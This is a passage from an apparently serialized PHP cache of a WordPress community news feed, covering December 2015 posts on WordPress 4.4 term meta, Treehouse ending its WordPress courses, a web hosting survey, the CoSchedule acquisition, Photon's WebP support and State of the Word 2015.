                                                                Taxonomy Term Meta

                                                                \n

                                                                In the last few releases cycles, the team has been working hard to complete tasks from the Taxonomy roadmap.

                                                                \n

                                                                In WordPress 4.3, the development team successfully split shared taxonomy terms, which ensures that terms can be uniquely identified by their term_id. In 4.4, the $taxonomy parameter is now optional in get_term() and get_term_field(), functions that previously required both $term_id and $taxonomy.

                                                                \n

                                                                WordPress 4.4 also introduces Term Meta where developers can use the new term meta API to store arbitrary data about taxonomy terms, in the same way you would for posts, users, or comments.

                                                                \n

                                                                Boone Gorges, one of the lead developers working on the roadmap, explains the improvements in detail related to Taxonomy data in WordPress 4.4.

                                                                \n

                                                                WP_Title is Not Deprecated

                                                                \n

                                                                Contrary to earlier reports, the core development team decided not to deprecate the WP_Title function. It’s considered a zombie function and add_theme_support( \'title-tag\' ); remains the recommended way to insert the title tag in themes.

                                                                \n

                                                                Miscellaneous Changes

                                                                \n\n

                                                                WordPress 4.4 has more than 2,000 commits from over 400 contributors. In the State of The Word 2015, Taylor says that one of the goals in this release was to go through the extensive backlog of tickets and review patches that were forgotten. Thanks to the efforts of volunteer bug gardeners on Trac, he accomplished that goal.

                                                                \n

                                                                If you experience any issues with WordPress 4.4, please report them on the support forums. Volunteers are watching support threads closely and, if warranted, will create a thread listing known issues. After updating your sites, come back and let us know what you think of the new features.

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 09 Dec 2015 00:18:35 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:19;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"WPTavern: Treehouse Drops Support for WordPress Education\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49377\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://wptavern.com/treehouse-drops-support-for-wordpress-education\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2197:\"

                                                                \"buddypress-treehouse-featured\"

                                                                \n

                                                                Treehouse will be discontinuing its WordPress education courses. According to Zac Gordon, one of the site’s former educators, no new WordPress, BuddyPress, or WooCommerce courses will be created and existing content will not be updated in the future.

                                                                \n

                                                                “The online learning company where I have been teaching WordPress for the last 3+ years told me that they were going to stop teaching WordPress, give my salary to a .NET teacher, and fire me,” Gordon said.

                                                                \n

                                                                In a post announcing his departure, Gordon said that during his employment at Treehouse he was unable to convince the company of the value of investing in WordPress.

                                                                \n

                                                                “While working at Treehouse I attended between 8-12 WordCamps per year and spoke about a range of the subjects I taught at Treehouse,” he said. “Not everyone knows this, but Treehouse didn’t pay for 95% of these trips. In fact, I regularly fought with Treehouse to see the value of sponsoring WordCamps, sending me to them to speak, and even that giving back to the community is an important thing we should do.”

                                                                \n

                                                                Gordon’s understanding is that Treehouse will now be focusing its resources on technologies like Java, .NET, and JavaScript.

                                                                \n

                                                                Despite the struggle to find a new way to support himself, Gordon is determined to continue teaching WordPress. Check out WP Tavern’s exclusive interview with him at WordCamp US where he elaborates on Treehouse’s decision.

                                                                \n

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 08 Dec 2015 20:54:56 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:20;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"WPTavern: WPShout Is Accepting Submissions for Its 2016 Web Hosting Survey\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49359\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"http://wptavern.com/wpshout-is-accepting-submissions-for-its-2016-webhosting-survey\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1469:\"\"WPShoutphoto credit: hfabulouscc\n

                                                                It’s that time of year again where WPShout is asking WordPress users far and wide to fill out its web hosting survey. The survey is not tied to any affiliate programs and serves as one of the few impartial resources where you can expect honest reviews from customers. The survey collects the following information:

                                                                \n
                                                                  \n
                                                                1. Average satisfaction
                                                                2. \n
                                                                3. Value
                                                                4. \n
                                                                5. Reliability
                                                                6. \n
                                                                7. Speed
                                                                8. \n
                                                                9. Support
                                                                10. \n
                                                                11. Median site count
                                                                12. \n
                                                                13. Usability
                                                                14. \n
                                                                15. WordPress compatibility
                                                                16. \n
                                                                \n

                                                                The survey is open until the end of the year and results will be published in January 2016. In 2014, only 159 people filled out the survey. If you have a few minutes to spare, please take the survey and help spread the word.

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 08 Dec 2015 18:34:37 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:21;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"WPTavern: Garret Moon and Justin Walsh Focus on CoSchedule After MABU Acquires Todaymade\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49367\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:100:\"http://wptavern.com/garret-moon-and-justin-walsh-focuses-on-coschedule-after-mabu-acquires-todaymade\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2388:\"\"CoScheduleCoSchedule Team\n

                                                                MABU, a marketing, management, and multimedia company has acquired WordPress development agency Todaymade for an undisclosed amount. The acquisition includes operational and intellectual assets including, the trade name, corporate website, a proprietary content management system called TodayCMS, and more than 50 hosted websites.

                                                                \n

                                                                Many in the WordPress community will recognize Todaymade as the sister company of CoSchedule, a service we reviewed in 2013. Since its launch, CoSchedule has grown to include more than 5,000 customers in 80 different countries. The company also received $500K in a Series A round of funding in 2014.

                                                                \n

                                                                What Customers Can Expect

                                                                \n

                                                                Garret Moon, Co-founder of CoSchedule, says its users will see immediate benefits from the acquisition, “We will be adding eight great team members from Todaymade to CoSchedule over the next several months – literally doubling our capacity to improve and support the product they use every day,” Moon said.

                                                                \n

                                                                Once the transition is complete, the company will have nearly 30 employees. Moon explains what customers can expect in the near future, “More features, better product performance, and even more responsive training and support,” he said.

                                                                \n

                                                                In addition to the acquisition, CoSchedule opened a new office in Fargo, ND to accommodate the new employees. These moves indicate the company is experiencing healthy growth and is moving in the right direction. If you use CoSchedule, what features do you want to see the expanded team focus on?

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 08 Dec 2015 18:31:12 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:22;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"WPTavern: Photon Adds WebP Support for Faster Loading Images\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49368\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"http://wptavern.com/photon-adds-webp-support-for-faster-loading-images\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:952:\"

                                                                Last week Jetpack announced that its Photon image service added support for the WebP image format, which provides up to 34% size reduction for served images when compared JPEG images of the same visual quality. For Photon users this translates into faster-loading pages.

                                                                \n

                                                                WebP is not yet natively supported by all browsers, so Photon will auto-detect the visitor’s browser and serve the images in the best quality/speed possible.

                                                                \n

                                                                I spoke with Jetpack team leader George Stephanis at WordCamp US about the improvements to Photon, and he broke it down for us in the video interview below.

                                                                \n

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 08 Dec 2015 18:06:17 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:23;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"Matt: State of the Word 2015\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=45692\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"http://ma.tt/2015/12/state-of-the-word-2015/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:548:\"
                                                                \n

                                                                Here is the State of the Word presentation I delivered on Saturday, and the following Q&A.

                                                                \n

                                                                If you just want to check out the slides, here they are on Slideshare:

                                                                \n

                                                                \n

                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 07 Dec 2015 15:27:53 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:24;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:98:\"WPTavern: State of the Word 2015: JavaScript and API-driven Interfaces Are the Future of WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49319\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:107:\"http://wptavern.com/state-of-the-word-2015-javascript-and-api-driven-interfaces-are-the-future-of-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:10156:\"

                                                                \"stateoftheword2015\"

                                                                \n

                                                                The inaugural WordCamp US was held this weekend at the Pennsylvania Convention Center in the heart of Philadelphia, one of America’s oldest cities. Roughly 1,800 WordPress enthusiasts came from all corners of the world to attend the event.

                                                                \n

                                                                Ambling down Philly’s historic streets, lined with Benjamin Franklin monuments, one cannot help but consider how far publishing has come since the days when each letter was laboriously placed to form documents with copies cranked out one at a time.

                                                                \n

                                                                Francis Bacon equated the power of the pen to that of gunpowder when he identified printing as one of three inventions that changed the world – “so much that no empire, no sect, no star seems to have exerted greater power and influence in human affairs.”

                                                                \n

                                                                WordPress has played a major part in making publishing available to everyone in the digital age, an important reason why the project’s influence continues to grow more than a decade later.

                                                                \n

                                                                Matt Mullenweg delivered his 10th annual State of the Word address to the largest WordCamp crowd to date. In reviewing stats from 2015 he highlighted the fact that WordPress now powers 25% of the web.

                                                                \n

                                                                “This is a not a chance to rest on our laurels,” he said. “It’s a demonstration that the world wants a free, open source solution for the web.

                                                                \n

                                                                Mullenweg shared 2015 stats that show the community behind WordPress is growing in tandem with its global usage:

                                                                \n
                                                                  \n
                                                                • 89 WordCamps with 21,000 attendees across 34 countries
                                                                • \n
                                                                • 601 unique organizers, 60% for the first time
                                                                • \n
                                                                • 1.6K speakers presented 2.1K sessions
                                                                • \n
                                                                • 40,000 people attended 2,000 meetups in the past year
                                                                • \n
                                                                \n

                                                                He also highlighted WordPress’ major improvements and milestones:

                                                                \n
                                                                  \n
                                                                • Moved from downloads to activity-based metrics in the theme and plugin directories
                                                                • \n
                                                                • Adopted Slack – over 2 million messages sent out in 2015, WP is one of the largest Slack instances in the world
                                                                • \n
                                                                • WordPress.tv code is now open source
                                                                • \n
                                                                • Localized plugin and theme directories
                                                                • \n
                                                                • All themes and plugins now support language packs
                                                                • \n
                                                                • The plugin directory crossed 1 billion downloads
                                                                • \n
                                                                • Twenty Fifteen theme is the most popular WordPress theme in history: 1.6 million active sites
                                                                • \n
                                                                • 205 accessibility tickets completed, an 80% increase from last year
                                                                • \n
                                                                • WordPress had three major releases: 4.1, 4.2, and 4.3.
                                                                • \n
                                                                \n

                                                                Mullenweg invited Scott Taylor, WordPress 4.4 release lead, to give a brief overview of what’s coming when the release ships Tuesday, December 8th. This historic release adds the scaffolding of the new WP REST API. It also includes the Twenty Sixteen default theme, responsive images, term meta, and oEmbed for WordPress content.

                                                                \n

                                                                “When WordPress adopts modern technologies, the internet adopts modern technologies,” Taylor said. He praised the efforts of more than 400 contributors who made 4.4 possible.

                                                                \n

                                                                At #wcus @wonderboymusic is presenting 4.4 during the #sotw. \"?\" pic.twitter.com/bc5rMOau5B

                                                                \n

                                                                — Matt Mullenweg (@photomatt) December 5, 2015

                                                                \n

                                                                \n

                                                                Mullenweg also announced release leads for 2016:

                                                                \n\n

                                                                JavaScript Interfaces and PHP APIs are the Future of WordPress

                                                                \n

                                                                Mullenweg’s address focused heavily on the the opportunities that the WP REST API is opening up for JavaScript-powered applications to run on top of WordPress. He highlighted four examples, including Microsoft Dynamics AX, Nomadbase.io, StoryCorps, and WordPress.com’s new architecture codenamed Calypso.

                                                                \n

                                                                “They say that the best way to predict the future is to create it,” he said. This was the motivation behind the Calypso project, which answers the question: “What would it look like if we designed WP admin completely from scratch?”

                                                                \n

                                                                Calypso is 100% JavaScript leveraging React, a totally new technology stack for Mullenweg’s collection of world class PHP-only developers. They all learned JavaScript in order to create a completely new approach to architecting WordPress.com.

                                                                \n

                                                                I believe quite strongly that JavaScript and API-driven interfaces are the future of not just WordPress but the web,” Mullenweg said. “Perhaps there could be a future where there might be something on the other side that is worth breaking backwards compatibility for.”

                                                                \n

                                                                Despite this new push for JavaScript, Mullenweg emphasized that PHP is not going away. “So much of the success of WordPress is due to the technologies it was built on,” he said.

                                                                \n

                                                                While new versions of PHP historically haven’t provided compelling reasons for people to upgrade, Mullenweg said that PHP7 changes all of that since it’s twice as fast as its predecessors. This means that a good chunk of the web will soon be doubling in speed.

                                                                \n

                                                                WordPress as an Advocate of the Open Web

                                                                \n

                                                                Mullenweg reaffirmed his strong belief in an open web during his address. As WordPress becomes more JavaScript and API-driven, the platform is better positioned to be a strong advocate of open web principles in terms of publishing access and formats, freedoms, interoperability of open APIs, and device access.

                                                                \n

                                                                “In some ways we are at a nadir of the open web,” Mullenweg said, noting that big players like Twitter have APIs that are getting more closed off. WordPress stands as a beacon in a sea of threats to digital freedom with its commitment to open APIs that work together.

                                                                \n

                                                                “An API is the key of an open web,” he said. “WordPress can and will reverse the trend of closed APIs. We’re one of the few platforms out there where it can be open in every layer of the stack.”

                                                                \n

                                                                What’s Ahead for WordPress in 2016?

                                                                \n

                                                                WordPress.org contributors will continue working on getting the top plugins and themes available in every language, which Mullenweg considers to be an “incredible opportunity to democratize the web.”

                                                                \n

                                                                He also noted that WordPress is still weak on customization. The project will need all hands on deck to move this feature forward in 2016.

                                                                \n

                                                                Customization is the single biggest opportunity for improving the WordPress experience,” he said.

                                                                \n

                                                                Mullenweg encouraged plugin developers to consider building JavaScript powered interfaces moving forward. In fact, he gave a homework assignment to all in attendance: “Learn JavaScript, deeply.”

                                                                \n

                                                                Homework assignment from @photomatt: Learn JavaScript, deeply. #WCUS pic.twitter.com/VHr2p4JB1O

                                                                \n

                                                                — WordCamp US (@WordCampUS) December 5, 2015

                                                                \n

                                                                \n

                                                                He emphasized that JavaScript is not only the future of WordPress but it’s also the future of the web. “It’s what’s going to allow WordPress to thrive for the next 13 years,” he said.

                                                                \n

                                                                Mullenweg said that he hopes WordPress developers will be inspired to become world-class JavaScript developers comparable to those in any other JS-powered open source project. A year of learning is ahead. Many developers will become reacquainted with what it feels like to be a beginner, including Mullenweg himself who pledged to contribute a JavaScript patch to core in 2016.

                                                                \n

                                                                “When WordPress launched, the biggest criticism is that the world already had too many blogging systems,” Mullenweg said. But the world didn’t yet have a blogging platform with the same philosophical underpinnings that early WordPress contributors embraced.

                                                                \n

                                                                A commitment to freedom and openness is WordPress’ true north, and it’s the reason the platform continues to dominate in 2015. Throughout its evolution as a blogging system to a full CMS, and now an application platform, WordPress continues to evolve towards being more open.

                                                                \n

                                                                “I think we can use this opening up, API-driven development to actually open up more of the web,” Mullenweg said. “We have a very exciting year ahead of us making the web a more open place.”

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 06 Dec 2015 20:45:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:25;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"Post Status: State of the Word, 2015\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"https://poststatus.com/?p=15150\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"https://poststatus.com/state-of-the-word-2015/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:9983:\"

                                                                The State of the Word started differently this year, with a formal introduction of Mullenweg by Philadelphia city councilman David Oh. December 5th is being recognized by the city council as “WordPress Day” for the city of Philadelphia.

                                                                \n

                                                                This is the tenth ever State of the Word. Matt teased the councilman, by calling himself Matt Mullenburg, as the councilman first introduced him.

                                                                \n

                                                                The top four sponsors (Jetpack, WooThemes, Bluehost, and Sucuri) donated more than $275,000 to make the first WCUS happen. I understand the full budget for the event was close to half a million dollars.

                                                                \n

                                                                Looking back

                                                                \n

                                                                Matt started his talk by focusing on Thanksgiving and how much we have to be thankful for. He also paused for a moment of silence for Alex King and Kim Parsell, both whom were influential community members and passed away this year.

                                                                \n

                                                                WCUS is the biggest WordCamp ever, with 1801 tickets sold. He walked through each WordCamp SF, prior to WCUS’s existence, and compared the event to how the dashboard looked at the same time.

                                                                \n

                                                                Milestones release

                                                                \n

                                                                Next week, Milestones: The Story of WordPress will be released officially. Written by Siobhan McKeown, the book was under development for a year and will continue to be iterated on.

                                                                \n

                                                                Community milestones in 2015

                                                                \n

                                                                WordCamps

                                                                \n

                                                                There have been 89 WordCamps in the world this year, with over 21,000 attendees from thirty-four countries. There were also over 40,000 people whom attended more than two thousand events.

                                                                \n

                                                                WordPress.org and tooling improvements

                                                                \n

                                                                The WordPress.org website has moved to, “a more activity based” metric system, so that now both themes and plugins show active installs.

                                                                \n

                                                                Also, Slack is now the primary live communication tool for the WordPress project, with over 2 million messages sent in the past year.

                                                                \n

                                                                WordPress.tv code is being redesigned and the code for it will be open source, which is true for most WordPress projects these days.

                                                                \n

                                                                Translations

                                                                \n

                                                                The plugin directory is available in more languages now, and all themes and plugins support language packs, which allows translation to happen at a community level, and doesn’t require shipping translations as part of the plugin package.

                                                                \n

                                                                Plugin activity

                                                                \n

                                                                Over 9,000 plugins were added to the official repo in 2015, and they have cumulatively downloaded more than 1 billion times since the start of the repo.

                                                                \n

                                                                WordPress passed a milestone recently, and now powers 25% of all websites in the world.

                                                                \n

                                                                WordPress Releases in 2015

                                                                \n

                                                                Three releases have occurred since the State of the Word last October: WordPress 4.1, 4.2, and 4.3. And WordPress 4.4 is due on Tuesday, December 8th. The three month schedule has proven successful for WordPress.

                                                                \n
                                                                  \n
                                                                • 4.1 was led by John Blackbourn
                                                                • \n
                                                                • 4.2 was led by Drew Jaynes
                                                                • \n
                                                                • 4.3 was led by Konstantin Obenland
                                                                • \n
                                                                • 4.4 is being lead by Scott Taylor
                                                                • \n
                                                                \n

                                                                WordPress 4.4

                                                                \n

                                                                Scott was invited on stage to talk about WordPress 4.4.

                                                                \n

                                                                WordPress 4.4 will have many long awaited developer features, including responsive images, term meta and the first half of the WordPress REST API, as well as user facing features like oEmbed for posts and the release of the Twenty Sixteen default theme.

                                                                \n

                                                                I like what Scott said about responsive images, when he noted that, “When WordPress adopts modern technologies, the Internet adopts modern technologies.” WordPress’s marketshare allows the core team to be a leader in enabling great new features on the web.

                                                                \n

                                                                Bluehost updates for WordPress and PHP

                                                                \n

                                                                80% of Bluehost’s more than 2 million websites were not on the latest WordPress version last year. They created a scanning process looking for out of date WordPress websites and helping guide automated updates for those websites. They were able to update almost all websites to the latest version, and it created only a minimal level of support to do so.

                                                                \n

                                                                Updating WordPress and PHP aren’t the same thing though.

                                                                \n

                                                                I interviewed a team member of Bluehost about this and will have more on it in a podcast. However, Bluehost and other hosts are going to work together to maintain a script that would allow for updating PHP as well as WordPress, and to do so without breaking websites.

                                                                \n

                                                                Upcoming WordPress release leads

                                                                \n
                                                                  \n
                                                                • WordPress 4.5: Mike Schroder
                                                                • \n
                                                                • WordPress 4.6: Dominik Schilling
                                                                • \n
                                                                • WordPress 4.7: Matt Mullenweg
                                                                • \n
                                                                \n

                                                                Six new committers have been added so far in 2015, and seven new committers were announced today:

                                                                \n
                                                                  \n
                                                                • Mike Schroder
                                                                • \n
                                                                • Mel Choyce
                                                                • \n
                                                                • Eric Lewis
                                                                • \n
                                                                • Joe Hoyle
                                                                • \n
                                                                • Rachel Baker
                                                                • \n
                                                                • Pascal Birchler
                                                                • \n
                                                                • Michael Arestad
                                                                • \n
                                                                \n

                                                                Featured WordPress projects

                                                                \n

                                                                There are a lot of awesome WordPress projects, and Matt highlighted some.

                                                                \n

                                                                REST API in action

                                                                \n
                                                                  \n
                                                                • Microsoft Dynamics AX is a project by WebDevStudios that uses the WordPress REST API to interface between Dynamics AX and the web.
                                                                • \n
